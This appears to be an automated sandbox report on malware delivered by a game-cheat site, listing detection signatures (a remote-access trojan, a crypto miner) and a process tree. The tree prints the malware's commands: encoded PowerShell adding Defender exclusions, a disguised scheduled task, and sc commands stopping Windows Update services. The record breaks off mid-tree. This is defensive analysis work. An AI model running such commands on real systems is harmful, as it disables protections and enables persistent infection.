Analysis

  • max time kernel
    247s
  • max time network
    295s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20230220-en locale:en-us os:windows10-2004-x64 system
  • submitted
    13-05-2023 18:51

General

  • Target

    http://cheats4pro.com

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • ParallaxRat

    ParallaxRat is a multipurpose RAT written in MASM.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 48 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:668
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:612
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:316
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:728
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:516
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
              1⤵
                PID:1192
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1272
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                1⤵
                  PID:1424
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1464
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                    1⤵
                      PID:1596
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                      1⤵
                        PID:1660
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                        1⤵
                          PID:1864
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                          1⤵
                            PID:1876
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                            1⤵
                              PID:1952
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                              1⤵
                                PID:1960
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                1⤵
                                  PID:1792
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                  1⤵
                                    PID:2064
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                    1⤵
                                      PID:2124
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                      1⤵
                                        PID:2320
                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                        1⤵
                                          PID:2448
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                          1⤵
                                            PID:2456
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                            1⤵
                                              PID:2328
                                            • C:\Windows\sysmon.exe
                                              C:\Windows\sysmon.exe
                                              1⤵
                                                PID:2512
                                              • C:\Windows\system32\sihost.exe
                                                sihost.exe
                                                1⤵
                                                  PID:2484
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                  1⤵
                                                    PID:2520
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                    1⤵
                                                      PID:2556
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                        PID:2572
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                        1⤵
                                                          PID:2580
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1284
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                            1⤵
                                                              PID:2596
                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                              1⤵
                                                                PID:8
                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                1⤵
                                                                  PID:3708
                                                                • C:\Windows\system32\DllHost.exe
                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                  1⤵
                                                                    PID:3404
                                                                    • C:\Windows\system32\WerFault.exe
                                                                      C:\Windows\system32\WerFault.exe -u -p 3404 -s 844
                                                                      2⤵
                                                                      • Program crash
                                                                      • Checks processor information in registry
                                                                      • Enumerates system info in registry
                                                                      PID:4624
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                    1⤵
                                                                      PID:1900
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      1⤵
                                                                        PID:4464
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                        1⤵
                                                                          PID:4816
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                          1⤵
                                                                            PID:4236
                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                            1⤵
                                                                              PID:4584
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                              1⤵
                                                                                PID:3684
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                1⤵
                                                                                  PID:404
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:4956
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4028
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3500
                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                          C:\Windows\system32\WerFault.exe -u -p 3500 -s 944
                                                                                          2⤵
                                                                                          • Program crash
                                                                                          • Checks processor information in registry
                                                                                          • Enumerates system info in registry
                                                                                          PID:756
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3300
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3120
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://cheats4pro.com
                                                                                            2⤵
                                                                                            • Adds Run key to start application
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4692
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa91569758,0x7ffa91569768,0x7ffa91569778
                                                                                              3⤵
                                                                                                PID:3200
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:2
                                                                                                3⤵
                                                                                                  PID:2660
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:3872
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1272 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                    3⤵
                                                                                                      PID:4520
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                      3⤵
                                                                                                        PID:2304
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2944 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:2900
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4396 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:620
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3280 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:3516
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5092 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:2672
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5224 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                3⤵
                                                                                                                  PID:1812
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                  3⤵
                                                                                                                    PID:2536
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                    3⤵
                                                                                                                      PID:4112
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5220 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                      3⤵
                                                                                                                        PID:4680
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4616 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                        3⤵
                                                                                                                          PID:2232
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                          3⤵
                                                                                                                            PID:2812
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3928 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                            3⤵
                                                                                                                              PID:4348
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5512 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                              3⤵
                                                                                                                                PID:3660
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3108 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                                3⤵
                                                                                                                                  PID:4488
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6028 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:1
                                                                                                                                  3⤵
                                                                                                                                    PID:1180
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5236 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                                    3⤵
                                                                                                                                      PID:2008
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3156 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:8
                                                                                                                                      3⤵
                                                                                                                                        PID:1612
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2748 --field-trial-handle=1796,i,13115259455748310131,17749406248646161064,131072 /prefetch:2
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:5112
                                                                                                                                    • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4979:84:7zEvent5635
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:2192
                                                                                                                                    • C:\Users\Admin\Downloads\C4PROLauncher.exe
                                                                                                                                      "C:\Users\Admin\Downloads\C4PROLauncher.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4348
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                        3⤵
                                                                                                                                          PID:1084
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:2008
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                                                                                                                          3⤵
                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:4536
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4632
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Modifies WinLogon for persistence
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:624
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                              5⤵
                                                                                                                                                PID:3776
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                  6⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:3672
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2140
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:3284
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                PID:2836
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3328
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5012
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                          2⤵
                                                                                                                                            PID:2552
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop UsoSvc
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4228
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:2588
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop wuauserv
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4036
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop bits
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:1836
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop dosvc
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4824
                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                            2⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:2112
                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                            2⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:4208
                                                                                                                                          • C:\Users\Admin\Downloads\C4PROLauncher.exe
                                                                                                                                            "C:\Users\Admin\Downloads\C4PROLauncher.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:4720
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                3⤵
                                                                                                                                                  PID:4636
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4648
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4064
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:780
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1532
                                                                                                                                                            • C:\Windows\System32\cmd.exe
